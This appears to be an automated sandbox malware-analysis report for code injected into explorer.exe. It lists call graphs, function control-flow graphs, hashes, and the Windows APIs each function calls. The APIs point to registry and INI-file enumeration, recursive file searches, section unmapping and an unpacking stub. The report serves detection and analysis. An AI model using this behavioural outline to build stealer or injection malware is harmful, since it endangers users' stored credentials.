                                                                                                                            • API ID: lstrcatlstrlen
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1475610065-0
                                                                                                                            • Opcode ID: a9e7e89dc03f76edb80b088144d5234a0126788cef72a077485408e925d148e8
                                                                                                                            • Instruction ID: 970ecc53e4bbb71f5ef02366fbb50e69e542ac26b33414ca77f385544e2d586a
                                                                                                                            • Opcode Fuzzy Hash: a9e7e89dc03f76edb80b088144d5234a0126788cef72a077485408e925d148e8
                                                                                                                            • Instruction Fuzzy Hash: 62E09BA230021C1B472077AE5C94E7F76DCCED95A5706003AFD04C3312EF599C0187B8

                                                                                                                            Execution Graph

                                                                                                                            Execution Coverage:21.8%
                                                                                                                            Dynamic/Decrypted Code Coverage:86.8%
                                                                                                                            Signature Coverage:0%
                                                                                                                            Total number of Nodes:182
                                                                                                                            Total number of Limit Nodes:16
                                                                                                                            execution_graph 986 e3a1e0 987 e3a1e6 986->987 990 e3a298 987->990 991 e3a29d 990->991 992 e3a385 LoadLibraryA 991->992 994 e3a3e0 VirtualProtect VirtualProtect 991->994 996 e3a248 991->996 992->991 995 e3a46e 994->995 995->995 931 e337f4 932 e33804 931->932 939 e3372c 932->939 935 e3387c 937 e33817 937->935 949 e336c8 937->949 940 e3375a 939->940 941 e33777 RegCreateKeyExW 940->941 942 e337bc RegCloseKey 941->942 943 e337cd 941->943 942->943 957 e31860 943->957 946 e322b4 947 e322d6 946->947 948 e322c8 CreateStreamOnHGlobal 946->948 947->937 948->947 950 e3371e 949->950 951 e336cd 949->951 950->935 952 e33716 951->952 961 e321e4 951->961 953 e31860 RtlFreeHeap 952->953 953->950 955 e33706 956 e31860 RtlFreeHeap 955->956 956->952 958 e3186e 957->958 959 e31886 958->959 960 e31878 RtlFreeHeap 958->960 959->935 959->946 960->959 962 e3220b 961->962 967 e31e20 962->967 965 e31860 RtlFreeHeap 966 e32297 965->966 966->955 977 e31e6d 967->977 968 e321b5 969 e31860 RtlFreeHeap 968->969 970 e321cb 969->970 970->965 971 e31860 RtlFreeHeap 971->968 972 e3219b 972->968 972->971 973 e32177 974 e31860 RtlFreeHeap 973->974 975 e3218e 974->975 975->972 976 e31860 RtlFreeHeap 975->976 976->972 977->968 977->972 977->973 978 e31860 RtlFreeHeap 977->978 978->973 1134 e3a1f9 1135 e3a479 1134->1135 1136 e3a228 1134->1136 1137 e3a298 3 API calls 1136->1137 1138 e3a248 1137->1138 979 e3a298 980 e3a29d 979->980 981 e3a385 LoadLibraryA 980->981 983 e3a3e0 VirtualProtect VirtualProtect 980->983 985 e3a3d5 980->985 981->980 984 e3a46e 983->984 984->984 997 e33668 1002 e33458 StrStrIW 997->1002 1000 e33458 17 API calls 1001 e336bd 1000->1001 1003 e3350f 1002->1003 1004 e3348f 1002->1004 1006 e33523 RegOpenKeyExW 1003->1006 1027 e32774 1004->1027 1007 e335e4 1006->1007 1018 e3354d 1006->1018 1008 e31860 RtlFreeHeap 1007->1008 1011 e335f7 1008->1011 1009 e335b5 RegEnumKeyExW 1009->1007 1009->1018 1010 e334a8 1010->1003 1012 e33507 1010->1012 1040 e328a0 1010->1040 1011->1000 1013 e31860 RtlFreeHeap 1012->1013 1013->1003 1016 e32700 RtlFreeHeap 1016->1018 1017 e334fa 1021 e31860 RtlFreeHeap 1017->1021 1018->1009 1018->1016 1020 e33458 14 API calls 1018->1020 1023 e31860 RtlFreeHeap 1018->1023 1020->1018 1021->1012 1023->1018 1026 e31860 RtlFreeHeap 1026->1017 1028 e32793 1027->1028 1029 e32797 RegOpenKeyExW 1027->1029 1028->1029 1030 e327d5 RegQueryValueExW 1029->1030 1031 e3286b 1029->1031 1033 e3285b RegCloseKey 1030->1033 1035 e327fe 1030->1035 1032 e3288d 1031->1032 1034 e32774 RtlFreeHeap 1031->1034 1032->1010 1033->1031 1033->1032 1034->1032 1035->1033 1036 e3281a RegQueryValueExW 1035->1036 1037 e32851 1036->1037 1038 e32844 1036->1038 1039 e31860 RtlFreeHeap 1037->1039 1038->1033 1039->1038 1042 e328b9 1040->1042 1041 e32922 1041->1017 1046 e32700 1041->1046 1042->1041 1043 e31860 RtlFreeHeap 1042->1043 1044 e328df 1043->1044 1044->1041 1045 e32774 5 API calls 1044->1045 1045->1044 1047 e32712 1046->1047 1048 e31860 RtlFreeHeap 1047->1048 1049 e3271d 1048->1049 1049->1017 1050 e33254 1049->1050 1074 e3298c 1050->1074 1053 e3343a 1053->1026 1054 e3298c GetFileAttributesW 1057 e33295 1054->1057 1055 e3342c 1083 e330a8 1055->1083 1057->1053 1057->1055 1078 e32938 1057->1078 1060 e33304 GetPrivateProfileSectionNamesW 1061 e3340c 1060->1061 1072 e3331e 1060->1072 1062 e31860 RtlFreeHeap 1061->1062 1063 e33414 1062->1063 1064 e31860 RtlFreeHeap 1063->1064 1065 e3341c 1064->1065 1066 e31860 RtlFreeHeap 1065->1066 1068 e33424 1066->1068 1067 e3334e GetPrivateProfileStringW 1069 e33379 GetPrivateProfileIntW 1067->1069 1067->1072 1070 e31860 RtlFreeHeap 1068->1070 1069->1072 1070->1055 1071 e330a8 RtlFreeHeap FindFirstFileW FindNextFileW FindClose 1071->1072 1072->1061 1072->1067 1072->1071 1073 e31860 RtlFreeHeap 1072->1073 1073->1072 1075 e32999 1074->1075 1077 e329a9 1074->1077 1076 e3299e GetFileAttributesW 1075->1076 1075->1077 1076->1077 1077->1053 1077->1054 1079 e32945 1078->1079 1080 e32980 1078->1080 1079->1080 1081 e3294a CreateFileW 1079->1081 1080->1060 1080->1061 1081->1080 1082 e32972 CloseHandle 1081->1082 1082->1080 1084 e330cc 1083->1084 1085 e330f1 FindFirstFileW 1084->1085 1086 e33237 1085->1086 1096 e33117 1085->1096 1087 e31860 RtlFreeHeap 1086->1087 1088 e3323f 1087->1088 1089 e31860 RtlFreeHeap 1088->1089 1090 e33247 1089->1090 1090->1053 1091 e32700 RtlFreeHeap 1091->1096 1092 e33210 FindNextFileW 1093 e33226 FindClose 1092->1093 1092->1096 1093->1086 1094 e31860 RtlFreeHeap 1094->1092 1096->1091 1096->1092 1096->1094 1097 e330a8 RtlFreeHeap 1096->1097 1098 e31860 RtlFreeHeap 1096->1098 1099 e32f7c 1096->1099 1097->1096 1098->1096 1109 e32bc0 1099->1109 1102 e33086 1102->1096 1104 e3307e 1105 e31860 RtlFreeHeap 1104->1105 1105->1102 1106 e32e04 RtlFreeHeap 1107 e32fb6 1106->1107 1107->1102 1107->1104 1107->1106 1108 e31860 RtlFreeHeap 1107->1108 1108->1107 1110 e32bf3 1109->1110 1111 e32700 RtlFreeHeap 1110->1111 1112 e32c54 1111->1112 1113 e32a54 RtlFreeHeap 1112->1113 1114 e32c68 1113->1114 1115 e31860 RtlFreeHeap 1114->1115 1116 e32c7e 1114->1116 1115->1116 1117 e31860 RtlFreeHeap 1116->1117 1123 e32cb2 1117->1123 1118 e32da3 1119 e31860 RtlFreeHeap 1118->1119 1120 e32dd9 1119->1120 1121 e31860 RtlFreeHeap 1120->1121 1122 e32de1 1121->1122 1122->1102 1125 e32a54 1122->1125 1123->1118 1124 e31860 RtlFreeHeap 1123->1124 1124->1118 1126 e32a86 1125->1126 1127 e31860 RtlFreeHeap 1126->1127 1128 e32ad9 1126->1128 1127->1128 1128->1107 1139 e33608 1140 e33458 17 API calls 1139->1140 1141 e3363b 1140->1141 1142 e33458 17 API calls 1141->1142 1143 e3365d 1142->1143 1129 e3a1af 1131 e3a1bd 1129->1131 1130 e3a1cf 1131->1130 1132 e3a298 3 API calls 1131->1132 1133 e3a248 1132->1133

                                                                                                                            Callgraph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            • Opacity -> Relevance
                                                                                                                            • Disassembly available
                                                                                                                            callgraph 0 Function_00E3A1E0 81 Function_00E3A298 0->81 1 Function_00E32360 2 Function_00E31560 3 Function_00E31DE0 28 Function_00E31A4C 3->28 4 Function_00E31860 34 Function_00E31AD4 4->34 5 Function_00E321E4 5->4 44 Function_00E31E20 5->44 59 Function_00E31838 5->59 6 Function_00E318E8 7 Function_00E322E8 8 Function_00E33668 40 Function_00E33458 8->40 9 Function_00E32B6C 80 Function_00E32514 9->80 82 Function_00E32498 9->82 10 Function_00E3156C 11 Function_00E323F0 51 Function_00E323AC 11->51 12 Function_00E32570 33 Function_00E32354 12->33 43 Function_00E323A0 12->43 12->59 13 Function_00E31576 14 Function_00E32774 14->4 14->14 14->59 15 Function_00E337F4 15->7 15->9 15->12 27 Function_00E336C8 15->27 15->33 49 Function_00E3372C 15->49 50 Function_00E322AC 15->50 57 Function_00E322B4 15->57 67 Function_00E32308 15->67 16 Function_00E3A1F9 16->81 17 Function_00E314F9 18 Function_00E318F8 19 Function_00E32AF8 19->59 20 Function_00E32EF8 78 Function_00E32610 20->78 21 Function_00E32F7C 21->4 21->20 26 Function_00E32BC0 21->26 37 Function_00E32A54 21->37 65 Function_00E32E04 21->65 22 Function_00E39FC2 23 Function_00E31C40 24 Function_00E32340 25 Function_00E329C0 68 Function_00E32688 25->68 26->4 26->37 52 Function_00E3272C 26->52 26->59 60 Function_00E31938 26->60 63 Function_00E32700 26->63 26->68 26->78 27->4 27->5 27->6 79 Function_00E31B14 27->79 29 Function_00E3234C 30 Function_00E318D0 31 Function_00E3A055 32 Function_00E33254 32->4 47 Function_00E330A8 32->47 32->52 58 Function_00E32938 32->58 32->59 32->68 71 Function_00E3298C 32->71 35 Function_00E314D4 36 Function_00E31254 37->4 37->59 38 Function_00E39ADA 39 Function_00E3A25A 40->4 40->14 40->25 40->32 40->40 42 Function_00E328A0 40->42 40->59 40->63 40->68 41 Function_00E31822 42->4 42->14 42->59 44->3 44->4 44->18 44->23 44->30 44->59 61 Function_00E31980 44->61 73 Function_00E3188C 44->73 76 Function_00E31D10 44->76 45 Function_00E399A7 46 Function_00E347A7 47->4 47->19 47->21 47->47 47->52 47->63 47->68 48 Function_00E3A1AF 48->81 49->4 49->59 53 Function_00E314B2 54 Function_00E39930 55 Function_00E338B0 55->34 55->55 55->59 56 Function_00E39EB4 62 Function_00E31000 63->4 63->68 64 Function_00E31405 65->4 65->59 72 Function_00E31B8C 65->72 66 Function_00E31508 68->59 69 Function_00E33608 69->40 70 Function_00E3B00C 72->59 73->59 74 Function_00E39912 75 Function_00E39C92 76->18 76->59 77 Function_00E32410 77->11 77->51 78->59 79->59 80->1 80->11 80->29 80->33 80->43 81->39 82->24 82->51 83 Function_00E3141D 84 Function_00E3971C

                                                                                                                            Executed Functions

                                                                                                                            Function 00E330A8 Relevance: 4.7, APIs: 3, Instructions: 153fileCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 184 e330a8-e330e3 call e32688 call e3272c 189 e330e5-e330e6 184->189 190 e330ec-e33111 call e32688 FindFirstFileW 184->190 189->190 193 e33237-e33252 call e31860 * 2 190->193 194 e33117-e33118 190->194 195 e3311f-e33124 194->195 198 e3312a-e3313e 195->198 199 e331ad-e331df call e32688 call e32700 195->199 206 e33210-e33220 FindNextFileW 198->206 207 e33144-e33158 198->207 214 e331e1-e331eb call e32af8 199->214 215 e33208-e3320b call e31860 199->215 206->195 209 e33226-e33230 FindClose 206->209 207->206 211 e3315e-e3316b call e3272c 207->211 209->193 219 e33176 211->219 220 e3316d-e33174 211->220 214->215 223 e331ed-e33203 call e32f7c 214->223 215->206 222 e33178-e331a8 call e32688 call e32700 call e330a8 call e31860 219->222 220->222 222->199 223->215
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3175037828.0000000000E31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E31000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_e31000_explorer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Find$File$CloseFirstNext
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3541575487-0
                                                                                                                            • Opcode ID: 1d486c4d822fa2842588a2a5b257e154b5955fe3e65b36dc891d1a63625ddf83
                                                                                                                            • Instruction ID: 3bcd9b6ca59de655fc9a96e9267729c3ef7a473fa059a62549125bc0fc90aa98
                                                                                                                            • Opcode Fuzzy Hash: 1d486c4d822fa2842588a2a5b257e154b5955fe3e65b36dc891d1a63625ddf83
                                                                                                                            • Instruction Fuzzy Hash: C4418130318B0C4FDB98EB38984DBAA7BD2FBD8340F445A6DA54AD3151EE78D904C781
                                                                                                                            Function 00E338B0 Relevance: 1.5, APIs: 1, Instructions: 40nativeCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 239 e338b0-e33907 call e31ad4 call e31838 NtUnmapViewOfSection call e3388c 248 e33911-e3391a 239->248 249 e33909-e3390c call e338b0 239->249 249->248
                                                                                                                            APIs
                                                                                                                            • NtUnmapViewOfSection.NTDLL ref: 00E338F2
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3175037828.0000000000E31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E31000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_e31000_explorer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: SectionUnmapView
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 498011366-0
                                                                                                                            • Opcode ID: 3effbf976d711b6f0a270e8bac9098164ff64bae19101d68ee38af86237bc783
                                                                                                                            • Instruction ID: 0578d2d95a472eb133859a6107703074cd49a265bedbb53fea97907aa406c2cf
                                                                                                                            • Opcode Fuzzy Hash: 3effbf976d711b6f0a270e8bac9098164ff64bae19101d68ee38af86237bc783
                                                                                                                            • Instruction Fuzzy Hash: 5CF0E520F11A080BEF6C77BD685D3382AC0EB98315F50192DB515E76D6DC3D8E45C301
                                                                                                                            Function 00E32774 Relevance: 6.1, APIs: 4, Instructions: 124registryCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • RegOpenKeyExW.KERNELBASE ref: 00E327C7
                                                                                                                            • RegQueryValueExW.KERNELBASE ref: 00E327F4
                                                                                                                            • RegQueryValueExW.KERNELBASE ref: 00E3283A
                                                                                                                            • RegCloseKey.KERNELBASE ref: 00E32860
                                                                                                                              • Part of subcall function 00E31860: RtlFreeHeap.NTDLL ref: 00E31880
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3175037828.0000000000E31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E31000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_e31000_explorer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: QueryValue$CloseFreeHeapOpen
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1641618270-0
                                                                                                                            • Opcode ID: 9230968f98c31981e9a295993d042543a9bd8a1a5e48c502c57164f1c8228ab1
                                                                                                                            • Instruction ID: ff3f2fec8b7a16efcd8f638360ab98fbe74e56253578f9b83725aee12899f7d9
                                                                                                                            • Opcode Fuzzy Hash: 9230968f98c31981e9a295993d042543a9bd8a1a5e48c502c57164f1c8228ab1
                                                                                                                            • Instruction Fuzzy Hash: 7E319230208B488FE768DB28D45877A7BE0FBA8359F54162EE5CAD2264DF24C846C742
                                                                                                                            Function 00E3372C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 71registryCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 22 e3372c-e337ba call e31838 RegCreateKeyExW 26 e337d6-e337f0 call e31860 22->26 27 e337bc-e337cb RegCloseKey 22->27 27->26 28 e337cd-e337d3 27->28 28->26
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3175037828.0000000000E31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E31000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_e31000_explorer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseCreate
                                                                                                                            • String ID: ?
                                                                                                                            • API String ID: 2932200918-1684325040
                                                                                                                            • Opcode ID: 857738d7a85a5e3c817c71693e64eb2082b10df52a007d4c7754adbbf86b2b9f
                                                                                                                            • Instruction ID: 096f1d2894aec097c300cd77060c3be93892cc92c80c9f7dcefe946a61f8e9cb
                                                                                                                            • Opcode Fuzzy Hash: 857738d7a85a5e3c817c71693e64eb2082b10df52a007d4c7754adbbf86b2b9f
                                                                                                                            • Instruction Fuzzy Hash: 41119370608B488FD754DF29D48C66ABBE1FB98345F40062FE48AD3220DF389985CB82
                                                                                                                            Function 00E3A298 Relevance: 4.8, APIs: 3, Instructions: 252memorylibraryCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 31 e3a298-e3a29b 32 e3a2a5-e3a2a9 31->32 33 e3a2b5 32->33 34 e3a2ab-e3a2b3 32->34 35 e3a2b7 33->35 36 e3a29d-e3a2a3 33->36 34->33 37 e3a2ba-e3a2c1 35->37 36->32 39 e3a2c3-e3a2cb 37->39 40 e3a2cd 37->40 39->40 40->37 41 e3a2cf-e3a2d2 40->41 42 e3a2e7-e3a2f4 41->42 43 e3a2d4-e3a2e2 41->43 55 e3a2f6-e3a2f8 42->55 56 e3a30e-e3a31c call e3a25a 42->56 44 e3a2e4-e3a2e5 43->44 45 e3a31e-e3a339 43->45 44->42 46 e3a36a-e3a36d 45->46 48 e3a372-e3a379 46->48 49 e3a36f-e3a370 46->49 51 e3a37f-e3a383 48->51 50 e3a351-e3a355 49->50 53 e3a357-e3a35a 50->53 54 e3a33b-e3a33e 50->54 57 e3a3e0-e3a3e9 51->57 58 e3a385-e3a39e LoadLibraryA 51->58 53->48 59 e3a35c-e3a360 53->59 54->48 64 e3a340 54->64 60 e3a2fb-e3a302 55->60 56->32 61 e3a3ec-e3a3f5 57->61 63 e3a39f-e3a3a6 58->63 65 e3a362-e3a369 59->65 66 e3a341-e3a345 59->66 78 e3a304-e3a30a 60->78 79 e3a30c 60->79 67 e3a3f7-e3a3f9 61->67 68 e3a41a-e3a46a VirtualProtect * 2 61->68 63->51 70 e3a3a8 63->70 64->66 65->46 66->50 77 e3a347-e3a349 66->77 72 e3a3fb-e3a40a 67->72 73 e3a40c-e3a418 67->73 74 e3a46e-e3a473 68->74 75 e3a3b4-e3a3bc 70->75 76 e3a3aa-e3a3b2 70->76 72->61 73->72 74->74 80 e3a475-e3a484 74->80 81 e3a3be-e3a3ca 75->81 76->81 77->50 82 e3a34b-e3a34f 77->82 78->79 79->56 79->60 85 e3a3d5-e3a3df 81->85 86 e3a3cc-e3a3d3 81->86 82->50 82->53 86->63
                                                                                                                            APIs
                                                                                                                            • LoadLibraryA.KERNELBASE ref: 00E3A397
                                                                                                                            • VirtualProtect.KERNELBASE(?,?,?,?,?,?,?,-00000003), ref: 00E3A441
                                                                                                                            • VirtualProtect.KERNELBASE ref: 00E3A45F
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3175037828.0000000000E39000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E39000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_e39000_explorer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ProtectVirtual$LibraryLoad
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 895956442-0
                                                                                                                            • Opcode ID: 58aacdddcf7ccbe6dd60936edcc7c5c7b61a302890236e98a304d03939a8bedf
                                                                                                                            • Instruction ID: e249d0b7ac10297db3e34c8d9ed7f7fa8b9b0732580829125a1b9cc9a1a37279
                                                                                                                            • Opcode Fuzzy Hash: 58aacdddcf7ccbe6dd60936edcc7c5c7b61a302890236e98a304d03939a8bedf
                                                                                                                            • Instruction Fuzzy Hash: A051583235891D4BCB24AA7898CC2F9BBD1F755325F1C163AC4DAD3294D959D8C6C382
                                                                                                                            Function 00E33254 Relevance: 4.7, APIs: 3, Instructions: 210COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 87 e33254-e33287 call e3298c 90 e3343a-e33456 87->90 91 e3328d-e33297 call e3298c 87->91 91->90 94 e3329d-e332aa call e3272c 91->94 97 e332b5 94->97 98 e332ac-e332b3 94->98 99 e332b7-e332c2 call e32688 97->99 98->99 102 e332c8-e332fe call e32688 call e31838 * 2 call e32938 99->102 103 e3342c-e33435 call e330a8 99->103 113 e33304-e33318 GetPrivateProfileSectionNamesW 102->113 114 e3340c-e33427 call e31860 * 4 102->114 103->90 113->114 115 e3331e-e33326 113->115 114->103 115->114 117 e3332c-e3332f 115->117 117->114 119 e33335-e33348 117->119 124 e333f0-e33406 119->124 125 e3334e-e33377 GetPrivateProfileStringW 119->125 124->114 124->117 125->124 127 e33379-e33398 GetPrivateProfileIntW 125->127 130 e333e5-e333eb call e330a8 127->130 131 e3339a-e333ad call e32688 127->131 130->124 135 e333c6-e333e3 call e330a8 call e31860 131->135 136 e333af-e333b3 131->136 135->124 137 e333b5-e333ba 136->137 138 e333bd-e333c4 136->138 137->138 138->135 138->136
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00E3298C: GetFileAttributesW.KERNELBASE ref: 00E3299E
                                                                                                                            • GetPrivateProfileSectionNamesW.KERNEL32 ref: 00E3330F
                                                                                                                            • GetPrivateProfileStringW.KERNEL32 ref: 00E3336F
                                                                                                                            • GetPrivateProfileIntW.KERNEL32 ref: 00E3338C
                                                                                                                              • Part of subcall function 00E330A8: FindFirstFileW.KERNELBASE ref: 00E33104
                                                                                                                              • Part of subcall function 00E31860: RtlFreeHeap.NTDLL ref: 00E31880
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3175037828.0000000000E31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E31000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_e31000_explorer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: PrivateProfile$File$AttributesFindFirstFreeHeapNamesSectionString
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 970345848-0
                                                                                                                            • Opcode ID: 2b93d8c4a12b134edfd1353bbe2ba01486881703c9a40a6279b7507c54960219
                                                                                                                            • Instruction ID: 93f65980e6788749cafeb8cf8ded26cf0c4879a6f50a47799246e26d2a9e0759
                                                                                                                            • Opcode Fuzzy Hash: 2b93d8c4a12b134edfd1353bbe2ba01486881703c9a40a6279b7507c54960219
                                                                                                                            • Instruction Fuzzy Hash: 9D51D830718F094FDB1DBB3CA85EA797AD2EB98340F4455ADE40AD3292EE64DD41C386
                                                                                                                            Function 00E33458 Relevance: 4.7, APIs: 3, Instructions: 172registryCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • StrStrIW.KERNELBASE ref: 00E3347E
                                                                                                                            • RegOpenKeyExW.KERNELBASE ref: 00E3353F
                                                                                                                            • RegEnumKeyExW.KERNELBASE ref: 00E335D6
                                                                                                                              • Part of subcall function 00E32774: RegOpenKeyExW.KERNELBASE ref: 00E327C7
                                                                                                                              • Part of subcall function 00E32774: RegQueryValueExW.KERNELBASE ref: 00E327F4
                                                                                                                              • Part of subcall function 00E32774: RegQueryValueExW.KERNELBASE ref: 00E3283A
                                                                                                                              • Part of subcall function 00E32774: RegCloseKey.KERNELBASE ref: 00E32860
                                                                                                                              • Part of subcall function 00E33254: GetPrivateProfileSectionNamesW.KERNEL32 ref: 00E3330F
                                                                                                                              • Part of subcall function 00E31860: RtlFreeHeap.NTDLL ref: 00E31880
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3175037828.0000000000E31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E31000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_e31000_explorer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: OpenQueryValue$CloseEnumFreeHeapNamesPrivateProfileSection
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1841478724-0
                                                                                                                            • Opcode ID: 64400a878c992fa71e856e46df4fac4649fc2a7aa652cbc33b09ef089e85c32b
                                                                                                                            • Instruction ID: 1ea37593c9d1f63b5ab46381f230dc66c8e4ae67c529af3dee4e3c51fbc96780
                                                                                                                            • Opcode Fuzzy Hash: 64400a878c992fa71e856e46df4fac4649fc2a7aa652cbc33b09ef089e85c32b
                                                                                                                            • Instruction Fuzzy Hash: 5D414930718B084FDB98EF7D949972ABAE2FB98341F00566EA18ED3261DE34D944C742
                                                                                                                            Function 00E32938 Relevance: 3.0, APIs: 2, Instructions: 34fileCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 232 e32938-e32943 233 e32945-e32948 232->233 234 e32984 232->234 233->234 235 e3294a-e32970 CreateFileW 233->235 236 e32986-e3298b 234->236 237 e32972-e3297a CloseHandle 235->237 238 e32980-e32982 235->238 237->238 238->236
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3175037828.0000000000E31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E31000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_e31000_explorer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseCreateFileHandle
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3498533004-0
                                                                                                                            • Opcode ID: c2797be9488e4e6f5c36404d807aecabd0db32494513c6dc611a488961ed8fb4
                                                                                                                            • Instruction ID: 54d0515a5100fd1398a1745b155ec05ca938682d9148d8d99a5d7ba71d4e2786
                                                                                                                            • Opcode Fuzzy Hash: c2797be9488e4e6f5c36404d807aecabd0db32494513c6dc611a488961ed8fb4
                                                                                                                            • Instruction Fuzzy Hash: 60F0E57021570A4FE7446FB8449C336B9E0FB88319F18563DE59AC22D0D7348842C702
                                                                                                                            Function 00E322B4 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 251 e322b4-e322c6 252 e322d6-e322e6 251->252 253 e322c8-e322d0 CreateStreamOnHGlobal 251->253 253->252
                                                                                                                            APIs
                                                                                                                            • CreateStreamOnHGlobal.COMBASE ref: 00E322D0
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3175037828.0000000000E31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E31000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_e31000_explorer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateGlobalStream
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2244384528-0
                                                                                                                            • Opcode ID: 1de76282c48f0bd08e98a48b657d2df2c7e3f359bfabb3919f08c1342ed29bc7
                                                                                                                            • Instruction ID: 2fdab92cff2978dd2fa3bf37450be161ca904b78e6585f53b5c2368efe5a0591
                                                                                                                            • Opcode Fuzzy Hash: 1de76282c48f0bd08e98a48b657d2df2c7e3f359bfabb3919f08c1342ed29bc7
                                                                                                                            • Instruction Fuzzy Hash: 01E08C30108B0A8FD758AFBCE4CA07A37E1EB9C256B05053EE005CB124D27988C1C741
                                                                                                                            Function 00E3298C Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 254 e3298c-e32997 255 e329b5 254->255 256 e32999-e3299c 254->256 258 e329b7-e329bc 255->258 256->255 257 e3299e-e329a7 GetFileAttributesW 256->257 259 e329b1-e329b3 257->259 260 e329a9-e329af 257->260 259->258 260->259
                                                                                                                            APIs
                                                                                                                            • GetFileAttributesW.KERNELBASE ref: 00E3299E
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3175037828.0000000000E31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E31000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_e31000_explorer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AttributesFile
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3188754299-0
                                                                                                                            • Opcode ID: adac2ff7f887c72d82cf14b017212d62fc95523d70b35a7e56ac7f1322cd4b31
                                                                                                                            • Instruction ID: 0f0d09ba80901e204d7ceb368e3fc0a9d92f68d263a326e34bcb385e38eac0ee
                                                                                                                            • Opcode Fuzzy Hash: adac2ff7f887c72d82cf14b017212d62fc95523d70b35a7e56ac7f1322cd4b31
                                                                                                                            • Instruction Fuzzy Hash: 3CD05E32612905076B6426F908DD3B128A0D75932EF14222EEB76D12A0E297C895E201
                                                                                                                            Function 00E31860 Relevance: 1.5, APIs: 1, Instructions: 20memoryCOMMON
                                                                                                                            Download Yara Rule

